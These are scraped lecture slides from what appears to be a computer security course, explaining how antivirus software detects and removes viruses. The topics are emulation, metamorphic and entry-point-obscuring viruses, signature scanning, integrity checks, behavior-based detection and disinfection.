Profile-based Emulation Poly Clean Poly #5 Clean File #2 Poly File #3 Poly #3

Profile-based Emulation Poly Clean Poly #5 Clean File #2 Poly File #3 Poly #3 b Clean #1 a #4 Poly File #1 b The profiles are specific to each polymorphic virus, limiting the search space. This reduces the number of iterations required on uninfected files. 65

Problems l Time consuming to generate profiles u l And if you get one

Problems l Time consuming to generate profiles u l And if you get one wrong you can miss stuff Lots of ways to get around GD u Random viruses » V will only run if the time is between 3 and 4 pm u Emulator-aware viruses » V detects in an emulator and hides u Maxed-out iteration viruses » V takes too long to emulate u 66 Entry-point Obscuring Viruses

MZ PE Section #1 Info Section #2 Info Section #3 Info Section #4 Info

MZ PE Section #1 Info Section #2 Info Section #3 Info Section #4 Info code code code code code cod code code code code JMPcode code cod data data data data data data d. reloc Decrypt virus. reloc virus. relo vi. relocvirus. reloc. relo virus virus vi 67. relocvirus. reloc. relo virus vi Entry-point Obscuring Viruses These viruses do not gain control at the main program entry-point. Instead, they modify the host program to transfer control to the virus at some obfuscated point in the program.

What to do… l Tailored code written to detect each strain of virus (knowledgeable

What to do… l Tailored code written to detect each strain of virus (knowledgeable about EPO approach) Typically low-level pseudo-code which evaluates program and can invoke emulator when necessary Fast to execute but can be time-consuming to write l But it gets worse… l l u u 68 Metamorphic viruses Integrated infection

The Metamorphic Virus These viruses rewrite their logic in each new infection! They have

The Metamorphic Virus These viruses rewrite their logic in each new infection! They have no byte-level fingerprint anywhere! Metamorphic strains use the current infection’s code as a template and then expand contract sets of instructions within the body to create a child infection. Problems: 1. Huge analysis time for researchers 2. Researchers forced to write new hand-coded detections for each new strain 3. Scanner performance potentially degrades linearly with 69 each new metamorphic detection

Integrated infection Rather than appending a single large chunk of code to target files,

Integrated infection Rather than appending a single large chunk of code to target files, integrated infectors disassemble their host, integrate their logic throughout the original logic, and reassemble. Problem: There is no big chunk of code to identify and scan. Disinfection is a nightmare. 70

Summary: Modern AV programs l l Its not grep Carefully constructed dictionary of known

Summary: Modern AV programs l l Its not grep Carefully constructed dictionary of known virus signatures u l Whole system emulator executes programs in sandbox, scanning for signatures during execution u u 71 Complex algorithmic signatures, not just strings Heuristics to determine how long to emulate, when to emulate etc…. Lots of tricks for speed

Virus Scanning: Pros & Cons l Pros u u l Effectively detects known viruses

Virus Scanning: Pros & Cons l Pros u u l Effectively detects known viruses before they can cause harm Few false alarms Cons u Can detect only viruses with known signatures » Assumption is that samples can be obtained u Signature set must be kept up to date » Can take 5 mins to identify simple signature, days for complex one u Signature set must be distributed to all clients » Symantec pushes 1. 4 B updates per day (~60 TB) u Virus writers can easily change virus signatures » Packers… 72 u Fundamentally a reactive business

Innoculation l l l Most viruses use so kind of marker to identify infected

Innoculation l l l Most viruses use so kind of marker to identify infected files Innoculation: add the marker to clean files so they won’t be infected Drawbacks: u u 73 Markerless or implicit marker viruses (e. g. file size, checksum) Lots of different markers for different viruses; need to change all files

Integrity Checks & whitelists l Virus scanner computes hash or checksum of executable files

Integrity Checks & whitelists l Virus scanner computes hash or checksum of executable files (or downloads hash of “known good” files) u u l 74 Assumed to be virus free! Stores the hash information Verifies new hash vs. saved one during scan

Integrity Checks: Pros & Cons l Pros u u u l Cons u u

Integrity Checks: Pros & Cons l Pros u u u l Cons u u 75 Can detect corruption of executables too Reliable Doesn’t require virus signatures False positives (i. e. recompilation, updates) Can’t use it on documents (they change too often)

Behavior-based Detection l Collection of ad hoc rules that identifies virus behavior or virus-like

Behavior-based Detection l Collection of ad hoc rules that identifies virus behavior or virus-like programs u Unusual system call behavior » E. g. if you try to transmit a buffer that contains the contents of a stack buffer you received from the network » Uncommon syscall/argument patterns from each codepoint u Modification of system executables/templates » normal. doc u u l 76 Self-modifying and self-referential code Rarely use instructions or lots of NOPs This is where the action was until very recently

Behavior-based detection: Pros & Cons l Pros u l Cons u u l 77

Behavior-based detection: Pros & Cons l Pros u l Cons u u l 77 Perhaps able to detect unknown viruses Good heuristics are hard to develop Bad heuristics have too many false positives All major AV programs have moved to incorporate behavioral techniques

Disinfection l l Ok, you found a virus in a file… now what? Standard

Disinfection l l Ok, you found a virus in a file… now what? Standard disinfection u u u l Generic disinfection u u 78 Virus saves the beginning of the file it overwrites (for control transfer) so it can correctly execute it later To clean: find virus, find original host file beginning, find size of virus. Now move original code to beginning, and truncate file to eliminate virus code Specialized to each virus Run program and emulate until it restores the file to its normal state (so it can execute normally); let the virus itself do the tough work Rewrite cleaned program back to disk Works with roughly covers 70% of viruses Problems: viruses that overwrite code, viruses with unknown entry points, viruses not well modeled by heuristics – when is image clean? )

Next time… l 79 Next time: Worms (and maybe bots)

Next time… l 79 Next time: Worms (and maybe bots)